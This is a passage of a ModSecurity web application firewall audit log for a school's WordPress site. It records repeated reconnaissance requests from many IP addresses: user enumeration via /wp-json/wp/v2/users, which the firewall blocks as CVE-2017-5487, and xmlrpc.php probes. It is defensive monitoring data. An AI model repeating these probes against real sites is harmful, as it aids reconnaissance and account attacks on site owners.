/wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe650817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe650817-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423204104348 3046 (- - -) Stopwatch2: 1747423204104348 3046; combined=1321, p1=423, p2=862, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe650817-Z-- --073f6729-A-- [17/May/2025:02:20:08 +0700] aCeP6NhEtho3ciA0wehdUwAAAIw 103.236.140.4 53736 103.236.140.4 8181 --073f6729-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --073f6729-C-- demo.sayHello --073f6729-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --073f6729-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423208665623 6420 (- - -) Stopwatch2: 1747423208665623 6420; combined=4579, p1=649, p2=3695, p3=39, p4=41, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --073f6729-Z-- --1b43c730-A-- [17/May/2025:02:21:14 +0700] aCeQKthEtho3ciA0wehdVQAAAIY 103.236.140.4 53740 103.236.140.4 8181 --1b43c730-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1b43c730-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b43c730-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423274928630 3249 (- - -) Stopwatch2: 1747423274928630 3249; combined=1379, p1=486, p2=862, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b43c730-Z-- --20d2b47f-A-- [17/May/2025:02:21:19 +0700] aCeQL9hEtho3ciA0wehdVgAAAIE 103.236.140.4 53744 103.236.140.4 8181 --20d2b47f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20d2b47f-C-- demo.sayHello --20d2b47f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20d2b47f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423279373619 5684 (- - -) Stopwatch2: 1747423279373619 5684; combined=4201, p1=567, p2=3412, p3=32, p4=35, p5=92, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20d2b47f-Z-- --63e78e0c-A-- [17/May/2025:02:22:42 +0700] aCeQgthEtho3ciA0wehdWAAAAJQ 103.236.140.4 53748 103.236.140.4 8181 --63e78e0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63e78e0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63e78e0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423362746433 3483 (- - -) Stopwatch2: 1747423362746433 3483; combined=1421, p1=474, p2=910, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63e78e0c-Z-- --7a389063-A-- [17/May/2025:02:22:49 +0700] aCeQidhEtho3ciA0wehdWgAAAJg 103.236.140.4 53752 103.236.140.4 8181 --7a389063-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7a389063-C-- demo.sayHello --7a389063-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a389063-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423369149590 5789 (- - -) Stopwatch2: 1747423369149590 5789; combined=4289, p1=613, p2=3452, p3=32, p4=36, p5=92, sr=78, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a389063-Z-- --95eb7850-A-- [17/May/2025:02:22:52 +0700] aCeQjNhEtho3ciA0wehdXAAAAIM 103.236.140.4 53756 103.236.140.4 8181 --95eb7850-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95eb7850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95eb7850-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423372507037 2773 (- - -) Stopwatch2: 1747423372507037 2773; combined=1246, p1=454, p2=763, p3=0, p4=0, p5=29, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95eb7850-Z-- --5d06de28-A-- [17/May/2025:02:22:57 +0700] aCeQkdhEtho3ciA0wehdXgAAAIU 103.236.140.4 53760 103.236.140.4 8181 --5d06de28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5d06de28-C-- demo.sayHello --5d06de28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d06de28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423377101440 4600 (- - -) Stopwatch2: 1747423377101440 4600; combined=3560, p1=422, p2=2939, p3=24, p4=25, p5=89, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d06de28-Z-- --c64ad754-A-- [17/May/2025:02:23:48 +0700] aCeQxNhEtho3ciA0wehdYAAAAIk 103.236.140.4 53770 103.236.140.4 8181 --c64ad754-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c64ad754-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c64ad754-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423428854549 2829 (- - -) Stopwatch2: 1747423428854549 2829; combined=1144, p1=382, p2=735, p3=0, p4=0, p5=27, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c64ad754-Z-- --48f30b29-A-- [17/May/2025:02:23:54 +0700] aCeQyte6THFz1hsaJaLZCQAAABA 103.236.140.4 53774 103.236.140.4 8181 --48f30b29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48f30b29-C-- demo.sayHello --48f30b29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48f30b29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423434946088 5769 (- - -) Stopwatch2: 1747423434946088 5769; combined=4279, p1=566, p2=3492, p3=32, p4=36, p5=90, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f30b29-Z-- --5eb2a635-A-- [17/May/2025:02:24:27 +0700] aCeQ68e47ocjCGWTS4Y-4wAAAE4 103.236.140.4 53782 103.236.140.4 8181 --5eb2a635-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5eb2a635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eb2a635-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423467720238 3648 (- - -) Stopwatch2: 1747423467720238 3648; combined=1533, p1=533, p2=966, p3=0, p4=0, p5=33, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eb2a635-Z-- --995bc619-A-- [17/May/2025:02:24:34 +0700] aCeQ8thEtho3ciA0wehdZAAAAIg 103.236.140.4 53786 103.236.140.4 8181 --995bc619-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --995bc619-C-- demo.sayHello --995bc619-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --995bc619-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423474885304 6379 (- - -) Stopwatch2: 1747423474885304 6379; combined=4563, p1=626, p2=3705, p3=37, p4=40, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --995bc619-Z-- --39c71e0d-A-- [17/May/2025:02:26:33 +0700] aCeRadhEtho3ciA0wehdZgAAAI8 103.236.140.4 53790 103.236.140.4 8181 --39c71e0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --39c71e0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39c71e0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423593993899 3184 (- - -) Stopwatch2: 1747423593993899 3184; combined=1363, p1=477, p2=856, p3=0, p4=0, p5=29, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39c71e0d-Z-- --41068636-A-- [17/May/2025:02:26:38 +0700] aCeRbthEtho3ciA0wehdaAAAAIw 103.236.140.4 53794 103.236.140.4 8181 --41068636-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --41068636-C-- demo.sayHello --41068636-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --41068636-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423598346252 6150 (- - -) Stopwatch2: 1747423598346252 6150; combined=4544, p1=521, p2=3718, p3=41, p4=41, p5=127, sr=70, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41068636-Z-- --5c494d67-A-- [17/May/2025:02:27:02 +0700] aCeRhthEtho3ciA0wehdagAAAIE 103.236.140.4 53800 103.236.140.4 8181 --5c494d67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5c494d67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c494d67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423622362900 2964 (- - -) Stopwatch2: 1747423622362900 2964; combined=1315, p1=460, p2=825, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c494d67-Z-- --0d0b6266-A-- [17/May/2025:02:27:08 +0700] aCeRjMe47ocjCGWTS4Y-5QAAAFQ 103.236.140.4 53810 103.236.140.4 8181 --0d0b6266-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0d0b6266-C-- demo.sayHello --0d0b6266-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d0b6266-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423628456216 4695 (- - -) Stopwatch2: 1747423628456216 4695; combined=3307, p1=485, p2=2650, p3=29, p4=29, p5=67, sr=99, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d0b6266-Z-- --c8d91976-A-- [17/May/2025:02:27:11 +0700] aCeRj9hEtho3ciA0wehdcQAAAIA 103.236.140.4 53818 103.236.140.4 8181 --c8d91976-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c8d91976-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8d91976-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423631855872 2243 (- - -) Stopwatch2: 1747423631855872 2243; combined=1072, p1=341, p2=705, p3=0, p4=0, p5=26, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8d91976-Z-- --2ed51e21-A-- 